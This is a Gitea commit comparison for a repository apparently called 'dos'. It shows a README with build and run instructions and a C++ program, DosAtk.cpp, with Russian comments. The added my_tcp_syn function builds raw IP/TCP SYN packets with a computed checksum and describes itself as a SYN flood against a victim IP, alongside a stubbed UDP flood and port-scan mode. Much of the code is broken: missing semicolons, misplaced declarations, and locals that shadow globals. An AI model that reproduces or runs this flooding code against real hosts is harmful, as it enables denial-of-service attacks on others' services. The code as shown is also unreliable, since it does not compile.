Compare commits

...

2 Commits

Author SHA1 Message Date
Павел Овчинников ffc76403a0 feat: my_tcp_syn and checksum (#8)
my_tcp_syn make tcp syn requests without waiting for confirmation.

Reviewed-on: https://gitea.serafimdev.com/serafim/dos/pulls/8
2025-04-03 00:52:49 +03:00
Serafim 43092ad1f4 style/improve-code-style (#7)
Reviewed-on: https://gitea.serafimdev.com/serafim/dos/pulls/7
Reviewed-by: dr-wh0 <79003667309@yandex.ru>
Co-authored-by: Serafim <simasuh@gmail.com>
Co-committed-by: Serafim <simasuh@gmail.com>
2025-04-03 00:23:50 +03:00
4 changed files with 446 additions and 233 deletions

5
.gitignore vendored
View File

@ -1 +1,4 @@
.vscode .vscode
src/test.cpp
test
DosAtk

View File

@ -1,7 +1,9 @@
# Как жить? # Как жить?
Регаемся на данном сайте, форкаем либу, пушим в свой форк и создаём merge request.
``` ```
git clone https://gitea.serafimdev.com/serafim/dos # Клонируем репозиторий git clone https://gitea.serafimdev.com/serafim/dos # Клонируем репозиторий (замените на свой форк!)
git checkout -b my_dns # Создаём ветку для реализации модуля my_dns git checkout -b my_dns # Создаём ветку для реализации модуля my_dns
git add * # Добавляем написанный код в комит git add * # Добавляем написанный код в комит
git commit -m 'Написал код' # Комитим в локальную ветку git commit -m 'Написал код' # Комитим в локальную ветку
@ -9,6 +11,17 @@ git push origin my_dns # Пушим свою ветку в репозитори
# Теперь в интерфейсе https://gitea.serafimdev.com/serafim/dos создаём пул реквест и пишем мне в тг # Теперь в интерфейсе https://gitea.serafimdev.com/serafim/dos создаём пул реквест и пишем мне в тг
``` ```
Для компиляции: # Компиляция
g++ DosAtk.cpp -lcurl
Если ошибка отсутствия заголовочного файла "curl.h", то нужно установить: sudo apt-get install libcurl4-openssl-dev Для компиляции: `./build.sh`, либо ручками: `g++ DosAtk.cpp -lcurl`
Если ошибка отсутствия заголовочного файла "curl.h", то нужно установить: `sudo apt-get install libcurl4-openssl-dev`
# Запуск
Пример запуска:
```
sudo ./DosAtk -a flood -i 127.0.0.1 -p 800
```
Запускается только на Линухе!

View File

@ -1,32 +1,41 @@
#include <iostream> // Для работы с вводом-выводом (cout, cin и др.) // ====== DCL библиотеки ====== //
#include <stdlib.h> // Стандартная библиотека C (функции работы с памятью, преобразования типов и др.)
#include <string> // Для работы со строками string
#include <chrono> // Для работы с временем и таймерами
#include <ctime> // Функции работы со временем C (time_t, localtime и др.)
#include <iomanip> // Для форматированного вывода (setw, setprecision и др.)
#include <getopt.h> // Для разбора аргументов командной строки
#include <cctype> // Функции для работы с символами (isdigit, isalpha и др.)
#include <curl/curl.h> // Библиотека libcurl для HTTP-запросов (отправка в Telegram)
// Глобальные переменные #include <cstring> // Работа со строками и памятью (memset, memcpy)
std::string attack_type; // Тип атаки: scan или syn #include <unistd.h> // POSIX API (close, read, write)
std::string domain; // Доменное Имя #include <sys/socket.h> // Сокеты (socket, setsockopt, sendto)
std::string ip; // Ip жертвы #include <netinet/ip.h> // Структура IP-заголовка (struct iphdr)
std::string port; // Порт #include <netinet/tcp.h> // Структура TCP-заголовка (struct tcphdr)
std::string log_file; // Путь к директории для логов #include <arpa/inet.h> // Преобразование IP-адресов (inet_addr, inet_pton)
std::string telegram_id; // Telegram ID для уведомлений #include <net/if.h> // Определение констант сетевых интерфейсов (IFNAMSIZ)
std::string telegram_token; // Токен бота #include <sys/ioctl.h> // Управление сокетами и интерфейсами (ioctl)
int n_ok_requests; // Количество успешных запросов #include <fcntl.h> // Флаги файловых дескрипторов (fcntl)
int n_fail_requests; // Количество не успешных запросов
std::chrono::system_clock::time_point start_timestamp; // Начальное время работы
std::string log_msg; // Сообщение, которое будет записано в лог-файл
std::string fin_msg; // Сообщение, которое будет выведено в консоль пользователю
std::string msg; // Сообщение, которое будет отправлено в телеграм
int status; // Статус работы программы
// ====== end of DCL ====== // // ====== DCL глобальные переменные ====== //
int my_check_params(int argc, char **argv) // Параметры
int argc // Количество аргументов при вызове программы
char **argv // Массив строк с агрументами
std::string attack_type; // Тип атаки: scan или syn
std::string domain; // Доменное Имя
std::string ip; // Ip жертвы
std::string port; // Порт для syn атаки
std::string log_file; // Путь к директории для логов
std::string telegram_id; // Telegram ID для уведомлений
std::string telegram_token; // Токен бота для уведомлений
// Статистика
int n_ok_requests; // Количество успешных запросов
int n_fail_requests; // Количество не успешных запросов
std::chrono::system_clock::time_point start_timestamp; // Начальное время работы
// Переменные
std::string log_msg; // Сообщение, которое будет записано в лог-файл
std::string fin_msg; // Сообщение, которое будет выведено в консоль пользователю
std::string msg; // Сообщение, которое будет отправлено в телеграм
int status; // Статус работы программы
// ====== DCL процедуры ====== //
void my_check_params()
{ {
// Данная процедура записывает в глобальные переменные параметры // Данная процедура записывает в глобальные переменные параметры
// (attack_type, domain, ip, port, log_file, telegram_id, telegram_token) проводимой атаки, поступившие при вызове программы // (attack_type, domain, ip, port, log_file, telegram_id, telegram_token) проводимой атаки, поступившие при вызове программы
@ -41,11 +50,18 @@ int my_check_params(int argc, char **argv)
// -101 - неизвестная опция или потерян аргумент, следует предложить вызвать флаг помощи // -101 - неизвестная опция или потерян аргумент, следует предложить вызвать флаг помощи
// -600 - пользователь ввел токен, но не id или наоборот // -600 - пользователь ввел токен, но не id или наоборот
int status; //Объявление
int opt; std::chrono::milliseconds ms; // Количество миллисекунд от целой секунды времени начала выполнения программы
const char* short_options; int opt; // Прочитанный параметр
short_options = "a:d:i:p:l:t:b:h"; const char* short_options; // Сокращения для параметров
const struct option long_options[] = struct option long_options[]; // Структура, описывающая пеобходимые программе параметры
int i; // Счётчик для цикла
// Инициализация
ms = std::chrono::duration_cast<std::chrono::milliseconds>(start_timestamp.time_since_epoch()) % 1000;
opt = -1;
short_options = "a:d:i:p:l:t:b:h";
long_options =
{ {
{"attack", required_argument, NULL, 'a'}, {"attack", required_argument, NULL, 'a'},
{"domain", required_argument, NULL, 'd'}, {"domain", required_argument, NULL, 'd'},
@ -57,14 +73,19 @@ int my_check_params(int argc, char **argv)
{"help", no_argument, NULL, 'h'}, {"help", no_argument, NULL, 'h'},
{NULL, 0, NULL, 0} {NULL, 0, NULL, 0}
}; };
i = 0;
std::string debug_msg; printf("begin my_check_params"); // debug
debug_msg = "";
for (int i = 0; i < argc; i++) { // Выводим информацию о времени запуска программы
debug_msg += argv[i]; printf("Starting DosAtk at %04d-%02d-%02d %02d:%02d:%02d.%03ld\n", // Шаблон для вывода
debug_msg += " "; std::localtime(&now_time_t)->tm_year + 1900, // Год (с 1900)
} std::localtime(&now_time_t)->tm_mon + 1, // Месяц (0-11)
printf("begin my_check_params (argc: %i, argv: %s)\n", argc, debug_msg.c_str()); // debug std::localtime(&now_time_t)->tm_mday, // День месяца
std::localtime(&now_time_t)->tm_hour, // Часы
std::localtime(&now_time_t)->tm_min, // Минуты
std::localtime(&now_time_t)->tm_sec, // Секунды
ms.count()); // Миллисекунды
// Обрабатываем аргументы командной строки с помощью getopt_long // Обрабатываем аргументы командной строки с помощью getopt_long
// Цикл продолжается, пока getopt_long возвращает валидные опции (-1 означает конец опций) // Цикл продолжается, пока getopt_long возвращает валидные опции (-1 означает конец опций)
@ -104,34 +125,33 @@ int my_check_params(int argc, char **argv)
if (status != 0 && status != -101) if (status != 0 && status != -101)
{ {
// Проверяем валидность типа атаки // Проверяем валидность типа атаки
if (attack_type != "flood" && attack_type != "scan") { if (attack_type != "flood" && attack_type != "scan") {
status = -1; // Некорректный тип атаки status = -1; // Некорректный тип атаки
} }
// Для сканирования портов должна быть указана цель (домен или IP) // Для сканирования портов должна быть указана цель (домен или IP)
else if (attack_type == "scan" && domain.empty() && ip.empty()) { else if (attack_type == "scan" && domain.empty() && ip.empty()) {
status = -10; // Не указана цель для сканирования status = -10; // Не указана цель для сканирования
} }
// Для флуд-атаки должна быть указана цель (домен или IP) // Для флуд-атаки должна быть указана цель (домен или IP)
else if (attack_type == "flood" && domain.empty() && ip.empty()) { else if (attack_type == "flood" && domain.empty() && ip.empty()) {
status = -20; // Не указана цель для флуда status = -20; // Не указана цель для флуда
} }
// Проверяем, что если указан Telegram ID или токен, то должны быть указаны оба // Проверяем, что если указан Telegram ID или токен, то должны быть указаны оба
else if ((!telegram_id.empty() && telegram_token.empty()) || else if ((!telegram_id.empty() && telegram_token.empty()) ||
(telegram_id.empty() && !telegram_token.empty())) { (telegram_id.empty() && !telegram_token.empty())) {
status = -600; // Неполные данные для Telegram status = -600; // Неполные данные для Telegram
} }
// Если все проверки пройдены и тип атаки - сканирование // Если все проверки пройдены и тип атаки - сканирование
else if (attack_type == "scan") { else if (attack_type == "scan") {
status = 1; // Валидные параметры для сканирования status = 1; // Валидные параметры для сканирования
} }
// Если все проверки пройдены и тип атаки - флуд // Если все проверки пройдены и тип атаки - флуд
else if (attack_type == "flood") { else if (attack_type == "flood") {
status = 2; // Валидные параметры для флуда status = 2; // Валидные параметры для флуда
} }
} }
printf("end my_check_params status: %i\n", status); // debug printf("end my_check_params status: %i\n", status); // debug
return status;
} }
void my_diag() void my_diag()
@ -139,8 +159,8 @@ void my_diag()
// Данная функция вызывается в случае ошибки на каком-то этапе и на основании поступившего кода, // Данная функция вызывается в случае ошибки на каком-то этапе и на основании поступившего кода,
// формирует сообщение с описанием произошедшей ошибки // формирует сообщение с описанием произошедшей ошибки
// Отладочный вывод - начало работы функции (можно отключить в релизной версии)
printf("begin my_diag, status: %i\n", status); // debug printf("begin my_diag, status: %i\n", status); // debug
// Выбор сообщения в зависимости от кода ошибки // Выбор сообщения в зависимости от кода ошибки
switch (status) switch (status)
{ {
@ -181,9 +201,18 @@ void my_diag()
// Принимает: const std::string& s - исходная строка для обработки // Принимает: const std::string& s - исходная строка для обработки
// Возвращает: std::string - строка с экранированными спецсимволами // Возвращает: std::string - строка с экранированными спецсимволами
std::string escape_json(const std::string& s) { std::string escape_json(const std::string& s) {
// Возвращаем строку с экранированными символами
// ===== Объявления =====
std::string result; // Результирующая строка с экранированными символами std::string result; // Результирующая строка с экранированными символами
char c; // Символ в строке
// ===== Инициализация =====
result = "";
c = '';
// Проходим по каждому символу входной строки // Проходим по каждому символу входной строки
for (char c : s) { for (c : s) {
// Обрабатываем специальные символы JSON // Обрабатываем специальные символы JSON
switch (c) { switch (c) {
case '"': result += "\\\""; break; // Экранирование двойных кавычек case '"': result += "\\\""; break; // Экранирование двойных кавычек
@ -196,17 +225,24 @@ std::string escape_json(const std::string& s) {
default: result += c; break; // Все остальные символы добавляем как есть default: result += c; break; // Все остальные символы добавляем как есть
} }
} }
return result; // Возвращаем обработанную строку return result; // Возвращаем обработанную строку
} }
bool is_numeric(const std::string& s) { bool is_numeric(const std::string& s) {
// Проверка, является ли строка числом (включая отрицательные) // Проверка, является ли строка числом (включая отрицательные)
// ===== Объявления =====
size_t start; // Индекс, с которого начинать проверку цифр size_t start; // Индекс, с которого начинать проверку цифр
size_t i;
// ===== Инициализация =====
start = 0;
i = 0;
if (s.empty()) return false; // Пустая строка не может быть числом if (s.empty()) return false; // Пустая строка не может быть числом
// Проверяем наличие знака минус в начале // Проверяем наличие знака минус в начале
start = 0;
if (s[0] == '-') { if (s[0] == '-') {
// Строка из одного минуса не является числом // Строка из одного минуса не является числом
if (s.size() == 1) return false; if (s.size() == 1) return false;
@ -214,50 +250,46 @@ bool is_numeric(const std::string& s) {
start = 1; start = 1;
} }
// Проверяем все оставшиеся символы на цифры // Проверяем все оставшиеся символы на цифры
for (size_t i = start; i < s.size(); ++i) { for (i = start; i < s.size(); ++i) {
// Найден нецифровой символ - строка не число // Найден нецифровой символ - строка не число
if (!isdigit(s[i])) return false; if (!isdigit(s[i])) return false;
} }
// Все проверки пройдены - строка является числом // Все проверки пройдены - строка является числом
return true; return true;
} }
int my_msg() { void my_msg() {
// Инициализация локальных переменных для работы с CURL printf("begin my_msg"); // debug
// Объявление
struct curl_slist* headers; // Заголовки HTTP-запроса
CURL* curl; // Указатель на CURL-объект CURL* curl; // Указатель на CURL-объект
std::string escaped_msg; // Экранированное сообщение для JSON std::string escaped_msg; // Экранированное сообщение для JSON
std::cout << msg << std::endl; // Вывод сообщения в консоль (для отладки)
std::string chat_id_field; // Поле chat_id для JSON std::string chat_id_field; // Поле chat_id для JSON
std::string json_data; // Итоговый JSON для отправки std::string json_data; // Итоговый JSON для отправки
struct curl_slist* headers; // Заголовки HTTP-запроса
headers = nullptr; // Инициализация заголовков
long http_code; // HTTP-код ответа long http_code; // HTTP-код ответа
CURLcode res; // Код результата CURL-операции CURLcode res; // Код результата CURL-операции
// Инициализация
headers = curl_slist_append(nullptr, "Content-Type: application/json"); // Установка заголовка Content-Type
curl = curl_easy_init(); // Инициализация CURL
escaped_msg = escape_json(msg); // Экранирование спецсимволов в сообщении для JSON
chat_id_field = is_numeric(telegram_id) ? "\"chat_id\": " + telegram_id : "\"chat_id\": \"" + telegram_id + "\"";
json_data = "{" + chat_id_field + ", \"text\": \"" + escaped_msg + "\"}"; // Сборка JSON-запроса
http_code = 0;
res = nullptr;
// Проверка наличия обязательных параметров Telegram // Проверка наличия обязательных параметров Telegram
if (telegram_token.empty() || telegram_id.empty()) { if (telegram_token.empty() || telegram_id.empty())
return 0; // Интеграция с Telegram не настроена (отсутствует токен или ID) {
status = 0; // Интеграция с Telegram не настроена (отсутствует токен или ID)
} }
// Инициализация CURL if (!curl)
curl = curl_easy_init(); {
if (!curl) return 6; // Ошибка инициализации CURL status = 6; // Ошибка инициализации CURL
// Экранирование спецсимволов в сообщении для JSON
escaped_msg = escape_json(msg);
// Формирование поля chat_id в зависимости от типа ID (число или строка)
if (is_numeric(telegram_id)) {
chat_id_field = "\"chat_id\": " + telegram_id; // Числовой ID
} else {
chat_id_field = "\"chat_id\": \"" + telegram_id + "\""; // Строковый ID
} }
// Сборка JSON-запроса
json_data = "{" + chat_id_field + ", \"text\": \"" + escaped_msg + "\"}";
// Установка заголовка Content-Type
headers = curl_slist_append(headers, "Content-Type: application/json");
// Настройка параметров CURL-запроса // Настройка параметров CURL-запроса
curl_easy_setopt(curl, CURLOPT_URL, ("https://api.telegram.org/bot" + telegram_token + "/sendMessage").c_str()); // URL API Telegram curl_easy_setopt(curl, CURLOPT_URL, ("https://api.telegram.org/bot" + telegram_token + "/sendMessage").c_str()); // URL API Telegram
@ -267,15 +299,17 @@ int my_msg() {
curl_easy_setopt(curl, CURLOPT_USERAGENT, "libcurl/7.68.0"); // User-Agent curl_easy_setopt(curl, CURLOPT_USERAGENT, "libcurl/7.68.0"); // User-Agent
// Игнорирование вывода ответа (пустая функция обратного вызова) // Игнорирование вывода ответа (пустая функция обратного вызова)
curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, [](void*, size_t size, size_t nmemb, void*) -> size_t { curl_easy_setopt(
return size * nmemb; curl, CURLOPT_WRITEFUNCTION,
}); [](void*, size_t size, size_t nmemb, void*) -> size_t {
return size * nmemb;
}
);
// Выполнение HTTP-запроса // Выполнение HTTP-запроса
res = curl_easy_perform(curl); res = curl_easy_perform(curl);
// Получение HTTP-кода ответа // Получение HTTP-кода ответа
http_code = 0;
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code);
// Освобождение ресурсов // Освобождение ресурсов
@ -283,57 +317,80 @@ int my_msg() {
curl_easy_cleanup(curl); // Завершение работы CURL curl_easy_cleanup(curl); // Завершение работы CURL
// Обработка ошибок CURL // Обработка ошибок CURL
if (res != CURLE_OK) return 5; // Ошибка выполнения запроса if (res != CURLE_OK)
{
status = 5; // Ошибка выполнения запроса
}
// Обработка HTTP-кодов ответа // Обработка HTTP-кодов ответа
switch (http_code) { switch (http_code)
case 200: return 0; // Успешный запрос {
case 401: return 1; // Ошибка авторизации (неверный токен) case 200:
case 400: return 2; // Неверный запрос status = 0; // Успешный запрос
case 404: return 3; // Ресурс не найден case 401:
default: status = 1; // Ошибка авторизации (неверный токен)
if (http_code >= 500) return 4; // Ошибка сервера case 400:
return 4; // Прочие ошибки status = 2; // Неверный запрос
case 404:
status = 3; // Ресурс не найден
case 500:
status = 4; // Ошибка сервера
} }
printf("end my_msg"); // debug
} }
int my_log() void my_log()
{ {
// Данная функция записывает в файл лога сообщение // Данная функция записывает в файл лога сообщение
return 0; printf("start my_log"); // debug
printf("end my_log"); // debug
} }
void my_fin() void my_fin()
{ {
// Данная функция завершает программу и рассчитывает итоговое время выполнения программы // Данная процедура завершает программу и рассчитывает итоговое время выполнения программы
// Объявления
time_t end_time_t; // Время завершения выполненя программы
std::chrono::duration duration; // Длительность выполнения программы
std::chrono::hours hours; // Компонента часов времени завершения
std::chrono::minutes minutes; // Компонента минут времени завершения
std::chrono::seconds seconds; // Компонента секунд времени завершения
std::chrono::milliseconds milliseconds; // Компонента миллисекунд времени завершения
// Фиксируем время окончания работы программы // Иницаализация
auto end_timestamp = std::chrono::system_clock::now(); end_time_t = std::chrono::system_clock::to_time_t(std::chrono::system_clock::now());
// Преобразуем время окончания в time_t и миллисекунды duration = end_timestamp - start_timestamp; // Вычисляем продолжительность работы программы
auto end_time_t = std::chrono::system_clock::to_time_t(end_timestamp); hours = std::chrono::duration_cast<std::chrono::hours>(duration); // Разбиваем продолжительность на компоненты
auto end_ms = std::chrono::duration_cast<std::chrono::milliseconds>(end_timestamp.time_since_epoch()) % 1000; minutes = std::chrono::duration_cast<std::chrono::minutes>(duration % std::chrono::hours(1)); // Разбиваем продолжительность на компоненты
seconds = std::chrono::duration_cast<std::chrono::seconds>(duration % std::chrono::minutes(1)); // Разбиваем продолжительность на компоненты
milliseconds = std::chrono::duration_cast<std::chrono::milliseconds>(duration % std::chrono::seconds(1)); // Разбиваем продолжительность на компоненты
double total_seconds
// Вычисляем продолжительность работы программы printf("begin my_diag\n"); // debug
auto duration = end_timestamp - start_timestamp;
// Разбиваем продолжительность на компоненты
auto hours = std::chrono::duration_cast<std::chrono::hours>(duration);
auto minutes = std::chrono::duration_cast<std::chrono::minutes>(duration % std::chrono::hours(1));
auto seconds = std::chrono::duration_cast<std::chrono::seconds>(duration % std::chrono::minutes(1));
auto milliseconds = std::chrono::duration_cast<std::chrono::milliseconds>(duration % std::chrono::seconds(1));
// Выводим информацию о времени работы std::cout << "Worked for "; // Выводим информацию о времени работы
std::cout << "Worked for ";
// Для коротких периодов (<2 минут) выводим в секундах с дробной частью // Для коротких периодов (<2 минут) выводим в секундах с дробной частью
if (duration < std::chrono::minutes(2)) { if (duration < std::chrono::minutes(2))
double total_seconds = std::chrono::duration<double>(duration).count(); {
total_seconds = std::chrono::duration<double>(duration).count();
std::cout << std::fixed << std::setprecision(3) << total_seconds << " seconds"; std::cout << std::fixed << std::setprecision(3) << total_seconds << " seconds";
} else {
// Для длительных периодов выводим в формате ЧЧ:ММ:СС.мс
if (hours.count() > 0) std::cout << hours.count() << "h ";
if (minutes.count() > 0) std::cout << minutes.count() << "m ";
std::cout << seconds.count() << "s " << milliseconds.count() << "ms";
} }
std::cout << std::endl; else
{
// Для длительных периодов выводим в формате ЧЧ:ММ:СС.мс
if (hours.count() > 0) // Если программа работала хотя бы один час
{
std::cout << hours.count() << "h "; // Выводим часы
}
if (minutes.count() > 0) // Если программа работала хотя бы одину минуту
{
std::cout << minutes.count() << "m "; // Вывовим минуты
}
std::cout << seconds.count() << "s " << milliseconds.count() << "ms"; // Выводим секунды и миллисекунды
}
std::cout << std::endl; // После осуществления вывода переходим на новую строку
// Выводим статистику по запросам // Выводим статистику по запросам
std::cout << "Sent " << (n_ok_requests + n_fail_requests) << " requests (" std::cout << "Sent " << (n_ok_requests + n_fail_requests) << " requests ("
@ -341,171 +398,311 @@ void my_fin()
// Выводим точное время завершения работы // Выводим точное время завершения работы
std::cout << "DosAtk stopped at " << std::put_time(std::localtime(&end_time_t), "%Y-%m-%d %H:%M:%S") std::cout << "DosAtk stopped at " << std::put_time(std::localtime(&end_time_t), "%Y-%m-%d %H:%M:%S")
<< "." << std::setfill('0') << std::setw(3) << end_ms.count() << std::endl; << "." << std::setfill('0') << std::setw(3) << milliseconds.count() << std::endl;
// Завершаем программу с кодом 0 (успешное завершение) // Завершаем программу с кодом состояния
std::exit(0); std::exit(status);
} }
int my_dns() void my_dns()
{ {
// Данная процедура сопостовляет доменное имя с IP // Данная процедура сопостовляет доменное имя с IP
return 0; printf("start my_dns"); // debug
printf("end my_dns"); // debug
} }
int my_tcp_syn() void my_tcp_syn()
{ {
// Данная процедура выполняет TCP SYN Flood атаку // Данная процедура выполняет TCP SYN Flood атаку
return 2; printf("start my_tcp_syn"); // debug
}
int my_udp()
{
// Данная процедура выполняет UDP Flood (port scanning) атаку
return 2;
}
int main(int argc, char **argv)
{
// Главная функция программы - точка входа
// Объявление переменных для хранения статусов операций printf("end my_tcp_syn"); // debug
int log_status; // Статус записи в лог }
int dns_status; // Статус DNS-разрешения
int udp_status; // Статус UDP-атаки
int tcp_syn_status; // Статус TCP SYN-атаки
// ====== Инициализация программы ====== // unsigned short checksum(void *data, int len) {
n_ok_requests = 0; // Счетчик успешных запросов /**
n_fail_requests = 0; // Счетчик неудачных запросов * Рассчитывает контрольную сумму для пакета (алгоритм RFC 1071)
start_timestamp = std::chrono::system_clock::now(); // Засекаем время начала *
status = 0; // Статус программы * Параметры:
* data - указатель на данные пакета
* len - длина данных в байтах
*
* Возвращает:
* 16-битную инвертированную контрольную сумму
*/
// === Объявление локальных переменных ===
uint16_t *ptr; // Указатель для чтения 16-битных слов
unsigned long sum; // Аккумулятор для суммы
uint8_t *byte_ptr; // Указатель для чтения одиночного байта
// === Инициализация переменных ===
ptr = (uint16_t *)data; // Инициализируем указатель на данные
sum = 0; // Начальное значение суммы
// === Основная логика процедуры ===
// Суммируем 16-битные слова
while (len > 1) {
sum += *ptr++; // Добавляем текущее слово и перемещаем указатель
len -= 2; // Уменьшаем счетчик оставшихся байт
}
if (len == 1) { // Если остался непарный байт, добавляем его в сумму
byte_ptr = (uint8_t *)ptr;
sum += *byte_ptr;
}
sum = (sum >> 16) + (sum & 0xFFFF); // Сворачиваем 32-битную сумму в 16 бит (перенос + остаток)
return (unsigned short)(~sum); // Возвращаем инвертированную 16-битную сумму
}
// Получаем текущее время в различных форматах
time_t now_time_t = std::chrono::system_clock::to_time_t(start_timestamp);
auto ms = std::chrono::duration_cast<std::chrono::milliseconds>(
start_timestamp.time_since_epoch()) % 1000;
// Выводим информацию о времени запуска программы void my_tcp_syn() {
printf("Starting DosAtk at %04d-%02d-%02d %02d:%02d:%02d.%03ld\n", /*
std::localtime(&now_time_t)->tm_year + 1900, // Год (с 1900) * Отправляет TCP SYN запрос на указанный IP и порт
std::localtime(&now_time_t)->tm_mon + 1, // Месяц (0-11) * status:
std::localtime(&now_time_t)->tm_mday, // День месяца * 0 - запрос успешно отправлен (атака продолжается)
std::localtime(&now_time_t)->tm_hour, // Часы * 2 - достигнуто максимальное количество запросов (1000)
std::localtime(&now_time_t)->tm_min, // Минуты * -201 - ошибка создания raw-сокета
std::localtime(&now_time_t)->tm_sec, // Секунды * -202 - ошибка отправки SYN-пакета
ms.count()); // Миллисекунды */
printf("start my_udp"); // debug
// ====== Основная логика программы ====== // // === Объявление локальных переменных ===
// 1. Проверяем параметры командной строки int sock; // Основной raw-сокет для отправки пакетов
status = my_check_params(argc, argv); int one; // Флаг для setsockopt
// Структуры для адресов
struct sockaddr_in target_addr; // Адрес цели
// Параметры подключения
uint16_t target_port = 0; // Порт цели (в сетевом порядке байт)
// Структуры заголовков
struct iphdr ip_header; // IP-заголовок пакета
struct tcphdr tcp_header; // TCP-заголовок пакета
// Псевдозаголовок для контрольной суммы
struct {
uint32_t saddr;
uint32_t daddr;
uint8_t zero;
uint8_t protocol;
uint16_t tcp_len;
} pseudo_header;
// Буферы данных
char temp_buf[sizeof(pseudo_header) + sizeof(tcphdr)]; // Буфер для контрольной суммы
char packet[sizeof(iphdr) + sizeof(tcphdr)]; // Итоговый пакет
// === Инициализация переменных ===
sock = -1;
one = 1;
target_port = htons(atoi(port.c_str()));
// === Основная логика процедуры ===
// 1. Создание raw-сокета
if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
status = -201;
return;
}
// 2. Установка опции IP_HDRINCL
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one));
// 3. Настройка адреса цели
memset(&target_addr, 0, sizeof(target_addr));
target_addr.sin_family = AF_INET;
inet_pton(AF_INET, ip.c_str(), &target_addr.sin_addr) <= 0
// 4. Формирование IP заголовка
memset(&ip_header, 0, sizeof(ip_header));
ip_header.ihl = 5;
ip_header.version = 4;
ip_header.tot_len = htons(sizeof(iphdr) + sizeof(tcphdr));
ip_header.ttl = 64;
ip_header.protocol = IPPROTO_TCP;
ip_header.saddr = inet_addr("127.0.0.1");
ip_header.daddr = inet_addr(ip.c_str());
// 5. Формирование TCP заголовка
memset(&tcp_header, 0, sizeof(tcphdr));
tcp_header.source = htons(12345);
tcp_header.dest = target_port;
tcp_header.seq = htonl(123456);
tcp_header.doff = 5;
tcp_header.syn = 1;
tcp_header.window = htons(5840);
// 6. Расчет контрольной суммы
pseudo_header = {
.saddr = ip_header.saddr,
.daddr = ip_header.daddr,
.zero = 0,
.protocol = IPPROTO_TCP,
.tcp_len = htons(sizeof(tcphdr))
};
memcpy(temp_buf, &pseudo_header, sizeof(pseudo_header));
memcpy(temp_buf + sizeof(pseudo_header), &tcp_header, sizeof(tcphdr));
tcp_header.check = checksum(temp_buf, sizeof(temp_buf));
// 7. Сборка пакета
memcpy(packet, &ip_header, sizeof(iphdr));
memcpy(packet + sizeof(iphdr), &tcp_header, sizeof(tcphdr));
// 8. Отправка пакета
if (sendto(sock, packet, sizeof(packet), 0,
(struct sockaddr *)&target_addr, sizeof(target_addr)) < 0) {
n_fail_requests++;
status = -202;
} else {
n_ok_requests++;
status = 0;
}
// 9. Проверка завершения
if ((n_ok_requests + n_fail_requests) >= 1000) {
status = 2;
}
close(sock);
printf("end my_udp"); // debug
}
int main(int arg_ctr, char **arg_ptr)
{
// Инициализация глобальных переменных
int argc = arg_ctr;
char **argv = arg_ptr;
std::string attack_type = "";
std::string domain = "";
std::string ip = "";
std::string port = "";
std::string log_file = "/var/log/DosAtk";
std::string telegram_id = "";
std::string telegram_token = "";
int n_ok_requests = 0;
int n_fail_requests = 0;
std::chrono::system_clock::time_point start_timestamp = std::chrono::system_clock::now();
std::string log_msg = "";
std::string fin_msg = "";
std::string msg;
int status = 0;
// Тело программы
// Проверяем параметры командной строки
my_check_params();
// Обрабатываем результат проверки параметров // Обрабатываем результат проверки параметров
switch (status) switch (status)
{ {
case 1: // Режим сканирования портов (UDP) case 1: // Режим сканирования портов (UDP)
// Пытаемся разрешить DNS (если указано доменное имя) // Пытаемся разрешить DNS (если указано доменное имя)
dns_status = my_dns(); my_dns();
if (dns_status == 0) // Если DNS разрешен успешно if (status == 0) // Если DNS разрешен успешно
{ {
// Запускаем цикл UDP-атаки // Запускаем цикл UDP-атаки
while (udp_status = my_udp()) while (true)
{ {
if (udp_status == 2) // Код завершения атаки my_udp()
if (status == 2) // Код завершения атаки
{ {
break; break;
} }
else if (udp_status < 0) // Обработка ошибок else if (status < 0) // Обработка ошибок
{ {
status = udp_status; my_diag(); // Выводим диагностику
my_diag(); // Выводим диагностику my_log(); // Пытаемся записать в лог
log_status = my_log(); // Пытаемся записать в лог if (status == 1) // Если записать лог не удалось
if (log_status == 1) // Если требуется уведомление
{ {
my_msg(); // Отправляем сообщение my_msg(); // Отправляем сообщение
} }
} }
} }
// Завершающие действия после атаки // Завершающие действия после атаки
log_status = my_log(); // Логируем завершение my_log(); // Логируем завершение
my_msg(); // Отправляем финальное сообщение my_msg(); // Отправляем финальное сообщение
my_fin(); // Корректно завершаем программу my_fin(); // Корректно завершаем программу
} }
else if (dns_status == 1) // Ошибка DNS-разрешения else if (status == 1) // Ошибка DNS-разрешения
{ {
my_diag(); // Выводим ошибку my_diag(); // Выводим ошибку
log_status = my_log(); // Логируем ошибку my_log(); // Логируем ошибку
if (log_status == 0) { // Если не требуется уведомление if (status == 0) // Если лог получилось записать
my_fin(); // Просто завершаем программу
}
else if (log_status == 1) // Если требуется уведомление
{ {
my_msg(); // Отправляем сообщение my_fin(); // Просто завершаем программу
my_fin(); // Завершаем программу }
else if (log_status == 1) // Если лог не удалось записать
{
my_msg(); // Отправляем сообщение
my_fin(); // Завершаем программу
} }
} }
break; break;
case 2: // Режим SYN-флуда (TCP) case 2: // Режим SYN-флуда (TCP)
// Аналогичная логика как для UDP-режима // Пытаемся разрешить DNS (если указано доменное имя)
dns_status = my_dns(); my_dns();
if (dns_status == 0) if (status == 0) // Если DNS разрешен успешно
{ {
while (tcp_syn_status = my_tcp_syn()) // Запускаем цикл UDP-атаки
while (true)
{ {
if (tcp_syn_status == 2) my_tcp_syn()
if (status == 2) // Код завершения атаки
{ {
break; break;
} }
else if (tcp_syn_status < 0) else if (status < 0) // Обработка ошибок
{ {
status = tcp_syn_status; my_diag(); // Выводим диагностику
my_diag(); my_log(); // Пытаемся записать в лог
log_status = my_log(); if (status == 1) // Если записать лог не удалось
if (log_status == 1)
{ {
my_msg(); my_msg(); // Отправляем сообщение
} }
} }
} }
log_status = my_log(); // Завершающие действия после атаки
my_msg(); my_log(); // Логируем завершение
my_fin(); my_msg(); // Отправляем финальное сообщение
my_fin(); // Корректно завершаем программу
} }
else if (dns_status == 1) else if (status == 1) // Ошибка DNS-разрешения
{ {
my_diag(); my_diag(); // Выводим ошибку
log_status = my_log(); my_log(); // Логируем ошибку
if (log_status == 0)
if (status == 0) // Если лог получилось записать
{ {
my_fin(); my_fin(); // Просто завершаем программу
} }
else if (log_status == 1) else if (log_status == 1) // Если лог не удалось записать
